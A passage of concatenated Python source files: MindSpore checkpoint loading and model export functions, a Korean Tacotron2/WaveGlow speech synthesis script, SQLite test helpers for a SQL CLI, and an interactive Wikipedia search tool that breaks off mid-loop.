    return parameter_dict
def load_param_into_net(net, parameter_dict, strict_load=False):
    """
    Loads parameters into network.

    Args:
        net (Cell): Cell network.
        parameter_dict (dict): Parameter dictionary.
        strict_load (bool): Whether to strict load the parameter into net. If False, it will load parameter
                            in the param_dict into net with the same suffix. Default: False

    Returns:
        list[str], names of net parameters that were not found in
        `parameter_dict` (after the optional suffix-matching pass).

    Raises:
        TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dictionary.

    Examples:
        >>> net = LeNet5()
        >>> param_dict = load_checkpoint("LeNet5-2_1875.ckpt")
        >>> load_param_into_net(net, param_dict)
    """
    if not isinstance(net, nn.Cell):
        logger.error("Failed to combine the net and the parameters.")
        msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
        raise TypeError(msg)

    if not isinstance(parameter_dict, dict):
        logger.error("Failed to combine the net and the parameters.")
        msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
        raise TypeError(msg)

    strict_load = Validator.check_bool(strict_load)
    logger.info("Execute load parameter into net process.")
    net.init_parameters_data()
    param_not_load = []
    for _, param in net.parameters_and_names():
        if param.name in parameter_dict:
            new_param = parameter_dict[param.name]
            if not isinstance(new_param, Parameter):
                logger.error("Failed to combine the net and the parameters.")
                msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
                raise TypeError(msg)
            _update_param(param, new_param)
        else:
            param_not_load.append(param.name)

    if param_not_load and not strict_load:
        # Second chance: match checkpoint keys that carry an extra common
        # prefix in front of the net's parameter names.
        _load_dismatch_prefix_params(net, parameter_dict, param_not_load)

    logger.debug("Params not matched(in net but not in parameter_dict):")
    for param_name in param_not_load:
        logger.debug("%s", param_name)

    logger.info("Load parameter into net finish, {} parameters has not been loaded.".format(len(param_not_load)))
    return param_not_load
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
    """When some net parameter did not load, try to continue load.

    Repeatedly searches for a common prefix mapping unmatched net parameter
    names onto checkpoint keys (dict_name == prefix + net_param_name), and
    loads those matches; mutates `param_not_load` in place.
    """
    prefix_name = ""
    longest_name = param_not_load[0]
    while prefix_name != longest_name and param_not_load:
        logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
        prefix_name = longest_name
        # Find any checkpoint key that ends with an unmatched net name; the
        # leftover head becomes the candidate prefix.
        for net_param_name in param_not_load:
            for dict_name in parameter_dict:
                if dict_name.endswith(net_param_name):
                    prefix_name = dict_name[:-len(net_param_name)]
                    break
            if prefix_name != longest_name:
                break

        if prefix_name != longest_name:
            logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
            for _, param in net.parameters_and_names():
                new_param_name = prefix_name + param.name
                if param.name in param_not_load and new_param_name in parameter_dict:
                    new_param = parameter_dict[new_param_name]
                    _update_param(param, new_param)
                    param_not_load.remove(param.name)
def _save_graph(network, file_name):
    """
    Saves the graph of network to a file.

    Args:
        network (Cell): Network whose serialized func-graph proto is saved.
        file_name (str): Destination path; made read-only after writing.
    """
    logger.info("Execute save the graph process.")
    graph_proto = network.get_func_graph_proto()
    if not graph_proto:
        return
    with open(file_name, "wb") as f:
        f.write(graph_proto)
    os.chmod(file_name, stat.S_IRUSR)
def _get_merged_param_data(net, param_name, param_data):
    """
    Gets the merged data(tensor) from tensor slice, by device arrangement and tensor map.

    Args:
        net (Cell): MindSpore network.
        param_name (str): The parameter name, which to be combined.
        param_data (Tensor): The parameter data on the local device,
            a slice of the whole parameter data.
    Returns:
        Tensor, the combined tensor which with the whole data value.
    """
    layout = net.parameter_layout_dict[param_name]
    # Layout entries: [dev_mat, tensor_map, _, field_size, uniform_split,
    # opt_shard_group] (indices 0,1,3,4,5 are read below).
    if len(layout) < 6:
        logger.info("layout dict does not contain the key %s", param_name)
        return param_data

    dev_mat = layout[0]
    tensor_map = layout[1]
    field_size = layout[3]
    uniform_split = layout[4]
    opt_shard_group = layout[5]

    if uniform_split == 0:
        raise RuntimeError("Save checkpoint only support uniform split tensor now.")

    # Imported lazily to avoid circular imports with the parallel package.
    from mindspore.parallel._cell_wrapper import get_allgather_cell
    from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
    # while any dim is not equal to -1, means param is split and needs to be merged
    # pipeline parallel need to be supported here later
    for dim in tensor_map:
        if dim != -1 or opt_shard_group:
            allgather_net = get_allgather_cell(opt_shard_group)
            param_data = allgather_net(param_data)
            if field_size:
                return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
            return _reshape_param_data(param_data, dev_mat, tensor_map)

    return param_data
def _fill_param_into_net(net, parameter_list):
    """
    Fills parameter_list into net.

    Args:
        net (Cell): train network.
        parameter_list (list): parameters list from ge callback; each item is a
            dict with at least a "name" key and a "data" value that exposes
            ``asnumpy()``.
    """
    parameter_dict = {}
    for each_param in parameter_list:
        param_name = each_param["name"]
        if isinstance(each_param["data"], Parameter):
            each_param["data"].init_data()
        np_val = each_param["data"].asnumpy()
        if np_val.shape == (1,):
            parameter_dict[param_name] = Parameter(np_val, name=param_name)
        elif np_val.shape == ():
            # 0-d array: rebuild a typed scalar Tensor so the dtype survives.
            parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
                                                   name=param_name)
        else:
            parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
    load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='AIR', **kwargs):
    """
    Export the MindSpore prediction model to a file in the specified format.

    Args:
        net (Cell): MindSpore network.
        inputs (Tensor): Inputs of the `net`.
        file_name (str): File name of the model to be exported.
        file_format (str): MindSpore currently supports 'AIR', 'ONNX' and 'MINDIR' format for exported model.

            - AIR: Ascend Intermediate Representation. An intermediate representation format of Ascend model.
              Recommended suffix for output file is '.air'.
            - ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
              Recommended suffix for output file is '.onnx'.
            - MINDIR: MindSpore Native Intermediate Representation for Anf. An intermediate representation format
              for MindSpore models.
              Recommended suffix for output file is '.mindir'.
        kwargs (dict): Configuration options dictionary.

            - quant_mode: The mode of quant.
            - mean: Input data mean. Default: 127.5.
            - std_dev: Input data variance. Default: 127.5.
    """
    logger.info("exporting model file:%s format:%s.", file_name, file_format)
    check_input_data(*inputs, data_class=Tensor)
    # Quantization-aware networks are converted to a deployable form first;
    # plain networks are returned unchanged by _quant_export.
    net = _quant_export(net, *inputs, file_format=file_format, **kwargs)
    _export(net, file_name, file_format, *inputs)
def _export(net, file_name, file_format, *inputs):
    """
    It is an internal conversion function. Export the MindSpore prediction
    model to a file in the specified format.

    Args:
        net (Cell): MindSpore network.
        file_name (str): Target file name.
        file_format (str): One of 'AIR', 'ONNX', 'MINDIR'; 'GEIR' is accepted
            as a deprecated alias of 'AIR'.
        inputs (Tensor): Example inputs used to compile the network.

    Raises:
        ValueError: If `file_format` is not supported.
    """
    def _write_proto_file(path, content):
        # Restrict permissions (owner read/write) before the payload lands.
        with open(path, 'wb') as f:
            os.chmod(path, stat.S_IWUSR | stat.S_IRUSR)
            f.write(content)

    logger.info("exporting model file:%s format:%s.", file_name, file_format)
    check_input_data(*inputs, data_class=Tensor)
    if file_format == 'GEIR':
        # Same message as before; the stray f-prefix (no placeholders) is gone.
        logger.warning("Format 'GEIR' is deprecated, it would be removed in future release, use 'AIR' instead.")
        file_format = 'AIR'
    supported_formats = ['AIR', 'ONNX', 'MINDIR']
    if file_format not in supported_formats:
        raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
    # When dumping ONNX file, switch network mode to infer when it is training
    # (NOTE: ONNX only designed for prediction).
    is_dump_onnx_in_training = net.training and file_format == 'ONNX'
    if is_dump_onnx_in_training:
        net.set_train(mode=False)
    # export model
    net.init_parameters_data()
    if file_format == 'AIR':
        graph_id, _ = _executor.compile(net, *inputs, phase='export.air')
        _executor.export(file_name, graph_id)
    elif file_format == 'ONNX':
        graph_id, _ = _executor.compile(net, *inputs, phase='export.onnx', do_convert=False)
        _write_proto_file(file_name, _executor._get_func_graph_proto(graph_id))
    else:  # file_format is 'MINDIR'
        graph_id, _ = _executor.compile(net, *inputs, phase='export.mindir', do_convert=False)
        _write_proto_file(file_name, _executor._get_func_graph_proto(graph_id, 'mind_ir'))
    # restore network training mode
    if is_dump_onnx_in_training:
        net.set_train(mode=True)
def _quant_export(network, *inputs, file_format, **kwargs):
    """
    Exports MindSpore quantization predict model to deploy with AIR and MINDIR.
    """
    if not kwargs.get('quant_mode', None):
        return network

    supported_device = ["Ascend", "GPU"]
    supported_formats = ['AIR', 'MINDIR']
    quant_mode_formats = ['AUTO', 'MANUAL']

    # Fall back to 127.5 for both statistics when absent or explicitly None.
    mean = kwargs['mean'] if kwargs.get('mean', None) is not None else 127.5
    std_dev = kwargs['std_dev'] if kwargs.get('std_dev', None) is not None else 127.5
    quant_mode = kwargs['quant_mode']
    if quant_mode not in quant_mode_formats:
        raise KeyError(f'Quant_mode input is wrong, Please choose the right mode of the quant_mode.')

    mean = Validator.check_type("mean", mean, (int, float))
    std_dev = Validator.check_type("std_dev", std_dev, (int, float))

    device_target = context.get_context('device_target')
    if device_target not in supported_device:
        raise KeyError("Unsupported {} device target.".format(device_target))
    if file_format not in supported_formats:
        raise ValueError('Illegal file format {}.'.format(file_format))

    network.set_train(False)
    # Pick the exporter class by quant mode and forward is_mindir only for MINDIR.
    exporter_cls = (quant_export.ExportManualQuantNetwork
                    if quant_mode == 'MANUAL' else quant_export.ExportToQuantInferNetwork)
    extra = {'is_mindir': True} if file_format == "MINDIR" else {}
    exporter = exporter_cls(network, mean, std_dev, *inputs, **extra)
    return exporter.run()
def parse_print(print_file_name):
    """
    Loads Print data from a specified file.

    Args:
        print_file_name (str): The file name of saved print data.

    Returns:
        List, element of list is Tensor (or str for description entries).

    Raises:
        ValueError: The print file may be empty, please make sure enter the correct file name.
        RuntimeError: The file content could not be decoded into tensors.
    """
    print_file_path = os.path.realpath(print_file_name)
    if os.path.getsize(print_file_path) == 0:
        raise ValueError("The print file may be empty, please make sure enter the correct file name.")
    logger.info("Execute load print process.")
    print_list = Print()
    try:
        with open(print_file_path, "rb") as f:
            pb_content = f.read()
        print_list.ParseFromString(pb_content)
    except BaseException as e:
        logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
        raise ValueError(e.__str__())
    tensor_list = []
    try:
        for print_ in print_list.value:
            # String type
            if print_.HasField("desc"):
                tensor_list.append(print_.desc)
            elif print_.HasField("tensor"):
                dims = print_.tensor.dims
                data_type = print_.tensor.tensor_type
                data = print_.tensor.tensor_content
                np_type = tensor_to_np_type[data_type]
                # np.fromstring on binary data is deprecated; np.frombuffer is
                # the supported equivalent for raw byte payloads.
                param_data = np.frombuffer(data, np_type)
                ms_type = tensor_to_ms_type[data_type]
                param_dim = list(dims)
                if param_dim:
                    param_value = param_data.reshape(param_dim)
                    tensor_list.append(Tensor(param_value, ms_type))
                # Scalar (0-d) type: coerce the single element to a python scalar.
                else:
                    data_type_ = data_type.lower()
                    if 'float' in data_type_:
                        param_data = float(param_data[0])
                    elif 'int' in data_type_:
                        param_data = int(param_data[0])
                    elif 'bool' in data_type_:
                        param_data = bool(param_data[0])
                    tensor_list.append(Tensor(param_data, ms_type))
    except BaseException as e:
        logger.error("Failed to load the print file %s.", print_list)
        raise RuntimeError(e.__str__())
    return tensor_list
def _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even):
    """
    Merge data slices to one tensor with whole data when strategy is not None.

    Args:
        sliced_data (list[numpy.ndarray]): Data slices in order of rank_id.
        parameter_name (str): Name of parameter.
        strategy (dict): Parameter slice strategy.
        is_even (bool): Slice manner that True represents slicing evenly and False represents slicing unevenly.

    Returns:
        Tensor, the merged Tensor which has the whole data.

    Raises:
        ValueError: Failed to merge.
    """
    layout = strategy.get(parameter_name)
    try:
        # Layout protobuf fields: device matrix, tensor map, per-slice shapes
        # along axis 0, and the field size used for weight-coupled reshape.
        dev_mat = list(layout.dev_matrix[0].dim)
        tensor_map = list(layout.tensor_map[0].dim)
        param_split_shape = list(layout.param_split_shape[0].dim)
        field_size = int(layout.field)
    except BaseException as e:
        raise ValueError(f"{e.__str__()}. please make sure that strategy matches the node_strategy.proto.")
    # Total device count is the product of the device-matrix dimensions.
    device_count = 1
    for dim in dev_mat:
        device_count *= dim
    if len(sliced_data) != device_count:
        raise ValueError(f"The sliced_parameters length should be equal to device_count. "
                         f"the sliced_parameters length is {len(sliced_data)} but device_count is {device_count}.")
    merged_tensor = None
    if not param_split_shape:
        # Even split: a plain axis-0 concatenation followed by a reshape.
        if not is_even:
            raise ValueError("The shape of every parameter in sliced_parameters should be the same "
                             "when slice manner is even.")
        all_gather_tensor = Tensor(np.concatenate(sliced_data))
        if field_size > 0:
            from mindspore.parallel._tensor import _reshape_param_data_with_weight
            merged_tensor = _reshape_param_data_with_weight(all_gather_tensor, dev_mat, [field_size])
        else:
            from mindspore.parallel._tensor import _reshape_param_data
            merged_tensor = _reshape_param_data(all_gather_tensor, dev_mat, tensor_map)
    else:
        # Uneven split: reorder the device slices by logical slice index, then
        # concatenate axis by axis from the last dimension backwards.
        from mindspore.parallel._tensor import _get_tensor_strategy, _get_tensor_slice_index
        tensor_strategy = _get_tensor_strategy(dev_mat, tensor_map)
        # Expected number of logical slices (product of per-axis cuts).
        slice_count = 1
        for dim in tensor_strategy:
            slice_count *= dim
        if len(param_split_shape) != slice_count:
            raise ValueError(f"The param_split_shape length in strategy should be {slice_count}, "
                             f"but got {len(param_split_shape)}.")
        tensor_slices_new = list(range(slice_count))
        tensor_slices = sliced_data
        for i in range(device_count):
            slice_index = int(_get_tensor_slice_index(dev_mat, tensor_strategy, tensor_map, i))
            if tensor_slices[i].shape[0] != param_split_shape[slice_index]:
                raise ValueError(f"The slice {slice_index} is {param_split_shape[slice_index]} in 0 axis, "
                                 f"but got {tensor_slices[i].shape[0]}.")
            tensor_slices_new[slice_index] = np.array(tensor_slices[i])
        # Repeatedly glue groups of slices along the current (last-first) axis
        # until a single full tensor remains.
        dim_len = len(tensor_strategy)
        for i in range(dim_len):
            ele_count = int(len(tensor_slices_new) / tensor_strategy[dim_len - 1 - i])
            tensor_slices_new_inner = []
            for j in range(ele_count):
                new_tensor = tensor_slices_new[j * tensor_strategy[dim_len - 1 - i]]
                for l in range(j * tensor_strategy[dim_len - 1 - i] + 1,
                               (j + 1) * tensor_strategy[dim_len - 1 - i]):
                    new_tensor = np.concatenate((new_tensor, tensor_slices_new[l]), axis=dim_len - 1 - i)
                tensor_slices_new_inner.insert(len(tensor_slices_new_inner), np.array(new_tensor))
            tensor_slices_new = tensor_slices_new_inner
        merged_tensor = Tensor(tensor_slices_new[0])
    return merged_tensor
def build_searched_strategy(strategy_filename):
    """
    Build strategy of every parameter in network.

    Args:
        strategy_filename (str): Name of strategy file.

    Returns:
        Dictionary, whose key is parameter name and value is slice strategy of
        this parameter.

    Raises:
        ValueError: Strategy file is incorrect.
        TypeError: strategy_filename is not str.

    Examples:
        >>> strategy_filename = "./strategy_train.ckpt"
        >>> strategy = build_searched_strategy(strategy_filename)
    """
    if not isinstance(strategy_filename, str):
        raise TypeError(f"The strategy_filename should be str, but got {type(strategy_filename)}.")
    if not os.path.isfile(strategy_filename):
        raise ValueError(f"No such strategy file: {strategy_filename}.")
    if os.path.getsize(strategy_filename) == 0:
        raise ValueError("The strategy file should not be empty.")

    parallel_strategy_map = ParallelStrategyMap()
    with open(strategy_filename, 'rb') as f:
        parallel_strategy_map.ParseFromString(f.read())

    layout_items = parallel_strategy_map.parallel_layout_item
    if not layout_items:
        raise ValueError("The strategy file has no sliced parameter.")

    # Map each parameter name to its parallel layout description.
    return {item.param_name: item.parallel_layouts for item in layout_items}
def merge_sliced_parameter(sliced_parameters, strategy=None):
    """
    Merge parameter slices to one whole parameter.

    Args:
        sliced_parameters (list[Parameter]): Parameter slices in order of rank_id.
        strategy (dict): Parameter slice strategy, the default is None.
            If strategy is None, just merge parameter slices in 0 axis order.

            - key (str): Parameter name.
            - value (<class 'node_strategy_pb2.ParallelLayouts'>): Slice strategy of this parameter.

    Returns:
        Parameter, the merged parameter which has the whole data.

    Raises:
        ValueError: Failed to merge.
        TypeError: The sliced_parameters is incorrect or strategy is not dict.
        KeyError: The parameter name is not in keys of strategy.

    Examples:
        >>> strategy = build_searched_strategy("./strategy_train.ckpt")
        >>> sliced_parameters = [
        >>>                      Parameter(Tensor(np.array([0.00023915, 0.00013939, -0.00098059])),
        >>>                                "network.embedding_table"),
        >>>                      Parameter(Tensor(np.array([0.00015815, 0.00015458, -0.00012125])),
        >>>                                "network.embedding_table"),
        >>>                      Parameter(Tensor(np.array([0.00042165, 0.00029692, -0.00007941])),
        >>>                                "network.embedding_table"),
        >>>                      Parameter(Tensor(np.array([0.00084451, 0.00089960, -0.00010431])),
        >>>                                "network.embedding_table")]
        >>> merged_parameter = merge_sliced_parameter(sliced_parameters, strategy)
    """
    if not isinstance(sliced_parameters, list):
        raise TypeError(f"The sliced_parameters should be list, but got {type(sliced_parameters)}.")
    if not sliced_parameters:
        raise ValueError("The sliced_parameters should not be empty.")
    if strategy and not isinstance(strategy, dict):
        raise TypeError(f"The strategy should be dict, but got {type(strategy)}.")
    try:
        parameter_name = sliced_parameters[0].name
        parameter_shape = sliced_parameters[0].data.shape
        parameter_shape_length = len(parameter_shape)
    except BaseException as e:
        raise TypeError(f"{e.__str__()}. the element in sliced_parameters should be Parameter.")
    is_even = True
    # All slices must agree on name, rank and every dimension except axis 0;
    # a mismatching axis-0 size marks the split as uneven.
    for index, parameter in enumerate(sliced_parameters):
        if not isinstance(parameter, Parameter):
            raise TypeError(f"The element in sliced_parameters should be Parameter, "
                            f"but got {type(parameter)} at index {index}.")
        if parameter.name != parameter_name \
                or len(parameter.data.shape) != parameter_shape_length \
                or parameter.data.shape[1:] != parameter_shape[1:]:
            raise ValueError("Please make sure that the elements in slice_parameters have the same name, "
                             "dimension length and shape except 0 axis")
        if parameter.data.shape != parameter_shape:
            is_even = False
    # The merged parameter inherits the flags of the first slice.
    layerwise_parallel = sliced_parameters[0].layerwise_parallel
    requires_grad = sliced_parameters[0].requires_grad
    sliced_data = [parameter.data.asnumpy() for parameter in sliced_parameters]
    merged_parameter = None
    if not strategy:
        # No layout information: slices are simply stacked along axis 0.
        merged_tensor = Tensor(np.concatenate(sliced_data))
        merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
    else:
        if parameter_name not in strategy.keys():
            raise KeyError(f"The parameter name should be one key of strategy. "
                           f"the parameter name is {parameter_name}.")
        merged_tensor = _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even)
        merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
    return merged_parameter
|
inference.py | ## 기본 라이브러리 Import
import sys
import numpy as np
import torch
import os
import argparse
## WaveGlow 프로젝트 위치 설정
sys.path.append('waveglow/')
## Tacontron2 프로젝트 위치 설정
sys.path.append('tacotron2/')
## 프로젝트 라이브러리 Import
from hparams import defaults
from model import Tacotron2
from layers import TacotronSTFT, STFT
from audio_processing import griffin_lim
from tacotron2.train import load_model
from text import text_to_sequence
from scipy.io.wavfile import write
import IPython.display as ipd
import json
from waveglow.glow import WaveGlow
from denoiser import Denoiser
from tqdm.notebook import tqdm
import soundfile as sf
import yaml
import torch.distributed as dist
from torch.multiprocessing import Process
def run(rank, size):
    """Distributed worker entry point (placeholder, intentionally empty).

    Args:
        rank (int): Rank of this process in the process group.
        size (int): Total number of processes in the group.
    """
    pass
def init_processes(rank, size, fn, backend='gloo'):
    """Join the torch.distributed group on localhost:29500, then call fn(rank, size)."""
    # Rendezvous address for all ranks (single-machine setup).
    os.environ.update({'MASTER_ADDR': '127.0.0.1', 'MASTER_PORT': '29500'})
    dist.init_process_group(backend, rank=rank, world_size=size)
    # dist.init_process_group(backend, init_method='tcp://10.1.1.20:23456', rank=rank, world_size=size)
    fn(rank, size)
## dict->object 변환용
class Struct:
    """Lightweight attribute container: turns keyword arguments (a dict) into object attributes."""

    def __init__(self, **entries):
        for key, value in entries.items():
            setattr(self, key, value)
def load_checkpoint(checkpoint_path, model):
    """Copy the weights of the 'model' entry of a checkpoint into *model* and return it."""
    assert os.path.isfile(checkpoint_path)
    # The checkpoint stores a full model object; only its state_dict is used.
    saved_model = torch.load(checkpoint_path, map_location='cpu')['model']
    model.load_state_dict(saved_model.state_dict())
    return model
class Synthesizer:
    """Tacotron2 + WaveGlow Korean text-to-speech pipeline (CUDA required)."""

    def __init__(self, tacotron_check, waveglow_check):
        # Build an hparams object from the defaults dict and pin audio settings.
        hparams = Struct(**defaults)
        hparams.n_mel_channels = 80
        hparams.sampling_rate = 22050
        hparams.distributed_run = False
        self.hparams = hparams
        # Tacotron2: text -> mel spectrogram.
        model = load_model(hparams)
        model.load_state_dict(torch.load(tacotron_check)['state_dict'])
        model.cuda().eval()  # .half()
        self.tacotron = model
        # WaveGlow vocoder: mel spectrogram -> waveform.
        with open('waveglow/config.json') as f:
            data = f.read()
        config = json.loads(data)
        waveglow_config = config["waveglow_config"]
        waveglow = WaveGlow(**waveglow_config)
        waveglow = load_checkpoint(waveglow_check, waveglow)
        waveglow.cuda().eval()
        self.denoiser = Denoiser(waveglow)
        self.waveglow = waveglow

    def inference(self, text):
        """Synthesize one sentence; returns (audio ndarray, sampling_rate)."""
        assert type(text) == str, "텍스트 하나만 지원합니다."
        sequence = np.array(text_to_sequence(text, ['korean_cleaners']))[None, :]
        sequence = torch.autograd.Variable(torch.from_numpy(sequence)).cuda().long()
        mel_outputs, mel_outputs_postnet, _, alignments = self.tacotron.inference(sequence)
        with torch.no_grad():
            audio = self.waveglow.infer(mel_outputs_postnet, sigma=0.666)
        audio = audio[0].data.cpu().numpy()
        return audio, self.hparams.sampling_rate

    # Synthesize a multi-line phrase: one inference per '\n'-separated sentence,
    # joined with `sep_length` samples of silence between sentences.
    def inference_phrase(self, phrase, sep_length=4000):
        texts = phrase.split('\n')
        audios = []
        for text in texts:
            if text == '':
                audios.append(np.array([0] * sep_length))
                continue
            audio, sampling_rate = self.inference(text)
            audios.append(audio)
            audios.append(np.array([0] * sep_length))
        return np.hstack(audios[:-1]), sampling_rate

    def denoise_inference(self, text, sigma=0.666):
        """Synthesize one sentence and denoise it.

        Bug fix: `sigma` was accepted but ignored (0.666 was hard-coded in the
        waveglow.infer call); it is now forwarded, with the same default.
        """
        assert type(text) == str, "텍스트 하나만 지원합니다."
        sequence = np.array(text_to_sequence(text, ['korean_cleaners']))[None, :]
        sequence = torch.autograd.Variable(torch.from_numpy(sequence)).cuda().long()
        mel_outputs, mel_outputs_postnet, _, alignments = self.tacotron.inference(sequence)
        with torch.no_grad():
            audio = self.waveglow.infer(mel_outputs_postnet, sigma=sigma)
        audio_denoised = self.denoiser(audio, strength=0.01)[:, 0].cpu().numpy()
        return audio_denoised.reshape(-1), self.hparams.sampling_rate
if __name__ == "__main__":
    # logger = logging.getLogger(__name__)
    # logger.setLevel(logging.INFO)
    # stream_handler = logging.StreamHandler()
    # logger.addHandler(stream_handler)
    # size = 2
    # processes = []
    # for rank in range(size):
    #     p = Process(target=init_processes, args=(rank, size, run))
    #     p.start()
    #     processes.append(p)
    #
    # for p in processes:
    #     p.join()
    with open('config.yaml') as f:
        # yaml.load without an explicit Loader is deprecated (and unsafe on
        # untrusted input); the config needs only plain scalars, so safe_load
        # is the correct replacement.
        config = yaml.safe_load(f)

    ## checkpoint paths
    tacotron2_checkpoint = config['tacotron2_checkpoint']
    waveglow_checkpoint = config['waveglow_checkpoint']

    ## build the synthesis module
    synthesizer = Synthesizer(tacotron2_checkpoint, waveglow_checkpoint)

    ## synthesize a single sentence
    sample_text = config['sample_text']
    audio, sampling_rate = synthesizer.inference(sample_text)

    ## save the audio
    sf.write('result.wav', audio, sampling_rate)
    #
    # ## phrase synthesis example
    # sample_phrase = """
    # 타코트론 모델은 음성 생성 길이가 제한되어 있습니다.
    # 즉 구문을 구성하려면 여러개의 문장을 생성한 후 합쳐야 합니다.
    # """
    # audio, sampling_rate = synthesizer.inference_phrase(sample_phrase)
    # ## save the audio
    # sf.write('구문.wav', audio, sampling_rate)
|
utils.py | # -*- coding: utf-8 -*-
import os
import time
import signal
import platform
import multiprocessing
from contextlib import closing
import sqlite3
import pytest
from usql.main import special
DATABASE = os.getenv("PYTEST_DATABASE", "test.sqlite3")
def db_connection(dbname=":memory:"):
    """Open a SQLite connection in autocommit mode (isolation_level=None)."""
    return sqlite3.connect(database=dbname, isolation_level=None)
# Probe once at import time whether an in-memory SQLite connection can be
# created; database-dependent tests are skipped when it cannot.
try:
    db_connection()
    CAN_CONNECT_TO_DB = True
except Exception as ex:
    CAN_CONNECT_TO_DB = False

# pytest marker: decorated tests are skipped when SQLite is unavailable.
dbtest = pytest.mark.skipif(
    not CAN_CONNECT_TO_DB, reason="Error creating sqlite connection"
)
def create_db(dbname):
    """Best-effort database (re)creation kept for API parity.

    SQLite has no DROP/CREATE DATABASE statements, so both statements raise
    and are swallowed — the function is effectively a no-op here.
    NOTE(review): `dbname` is ignored; the cursor always comes from the
    default in-memory connection — confirm whether that is intended.
    """
    with closing(db_connection().cursor()) as cur:
        try:
            cur.execute("""DROP DATABASE IF EXISTS _test_db""")
            cur.execute("""CREATE DATABASE _test_db""")
        except:
            pass
def drop_tables(dbname):
    """Best-effort cleanup counterpart of create_db.

    DROP DATABASE is not valid SQLite, so the statement fails and is
    swallowed — effectively a no-op kept for API parity.
    NOTE(review): `dbname` is ignored, same as in create_db.
    """
    with closing(db_connection().cursor()) as cur:
        try:
            cur.execute("""DROP DATABASE IF EXISTS _test_db""")
        except:
            pass
def run(executor, sql, rows_as_list=True):
    """Run *sql* through *executor* and collect every result set.

    Each (title, rows, headers, status) tuple yielded by ``executor.run`` is
    packed into a dict; when `rows_as_list` is true, non-empty row iterables
    are materialized into lists so tests can compare them directly.
    """
    collected = []
    for title, rows, headers, status in executor.run(sql):
        if rows_as_list and rows:
            rows = list(rows)
        collected.append(
            {"title": title, "rows": rows, "headers": headers, "status": status}
        )
    return collected
def set_expanded_output(is_expanded):
    """Pass-through to `special.set_expanded_output` for the tests."""
    return special.set_expanded_output(is_expanded)
def is_expanded_output():
    """Pass-through to `special.is_expanded_output` for the tests."""
    return special.is_expanded_output()
def send_ctrl_c_to_pid(pid, wait_seconds):
    """Sends a Ctrl-C like signal to the given `pid` after `wait_seconds`
    seconds."""
    time.sleep(wait_seconds)
    # CTRL_C_EVENT only exists on Windows; the attribute is looked up lazily.
    if platform.system() == "Windows":
        sig = signal.CTRL_C_EVENT
    else:
        sig = signal.SIGINT
    os.kill(pid, sig)
def send_ctrl_c(wait_seconds):
    """Create a process that sends a Ctrl-C like signal to the current process
    after `wait_seconds` seconds.

    Returns the `multiprocessing.Process` created.
    """
    proc = multiprocessing.Process(
        target=send_ctrl_c_to_pid,
        args=(os.getpid(), wait_seconds),
    )
    proc.start()
    return proc
|
wiki.py | #!/usr/bin/python
#coding=utf-8
import os,sys,warnings,requests,time,urllib,threading,csv
import wikipedia as wiki
from PIL import Image
from io import BytesIO
from locale import getdefaultlocale
warnings.filterwarnings('ignore')
try:
    # Detect the OS locale (e.g. "tr_TR") and keep only the language part.
    langue=getdefaultlocale()
    langue=langue[0]
    langue=langue.split("_")
    l=str(langue[0])
except:
    # Locale detection failed: fall back to English.
    print("Chikapedia failed to get your computer's Langue.")
    print("Switching bacc default langue which is English.")
    l="en"
wiki.set_lang(l)
try:
    # Prompt strings used by the interactive loop: Turkish when the locale
    # language is "tr", English otherwise.
    if l=="tr":
        l_wiki="Wikide ara: "
        l_how_many="Kaç sonuç: "
        l_search="Ara: "
        l_num="Numara gir: "
        l_learn_more="Resim görmek ve daha fazla öğrenmek istermisin? (E/H)"
        l_exit=f"Çıkmak için küçük harfle çık.\nProgramı yeniden çalıştırmak için herhangi bişey yazın:\n"
    else:
        l_wiki="wiki: "
        l_how_many="How Many results you want to see: "
        l_search="Search: "
        l_num="Enter a number: "
        l_learn_more="Would you like to see pictures and learn more? (Y/N)"
        l_exit=f"Type quit to exit or anything else to restart the program\n:"
except:
    # Legacy guard: abort hard if the prompt assignments somehow fail.
    os._exit(1)
def k():
    """Print a horizontal separator line between UI sections."""
    print("-------------------------------------------")
def x():
    """Interactive Wikipedia search loop.

    Repeatedly: prompt for a query, list the top results, show the summary of
    the chosen result, and optionally dump the full article text plus its
    images to disk.  Runs until the user types a quit keyword; any uncaught
    error silently ends the loop (legacy bare except).
    """
    try:
        while True:
            clear()
            print("Yes my Lord!")
            feed=str(input(l_wiki))
            # Quit keywords in both English and Turkish.
            if feed=="quit" or feed=="çıkış" or feed=="exit" or feed=="q" or feed=="çık":
                os._exit(1)
            result=int(input(l_how_many))
            k()
            v=wiki.search(feed,results=result)
            # Show the candidates as "[index]-title".
            n=0
            for s in v:
                #print(f" {v[n]}")# 1-) XXXXXXXX
                print('['+str(n)+']''-'+v[n])
                n+=1
            k()
            n_index=int(input(l_num))
            target_info=v[int(n_index)]
            #ara=str(input(l_search))
            k()
            new_info=wiki.summary(target_info, auto_suggest=True, redirect=True)
            print(f"{new_info}")
            k()
            ans=str(input(l_learn_more))
            ans=ans.lower()
            # "y" (yes) or "e" (evet) → show the full article and its pictures.
            if ans.startswith("y") or ans.startswith("e"):
                clear()
                s=wiki.WikipediaPage(title=target_info,redirect=True,preload=True)
                cont=s.content
                imgs=s.images
                print(cont)
                with open("Last Article.txt","w",encoding='UTF-8') as f:#Write content to file
                    w = csv.writer(f,delimiter=",",lineterminator="\n")
                    w.writerow([cont])
                # Download and display each image; failures are skipped.
                img_num=0
                for i in imgs:
                    try:
                        url=imgs[img_num]
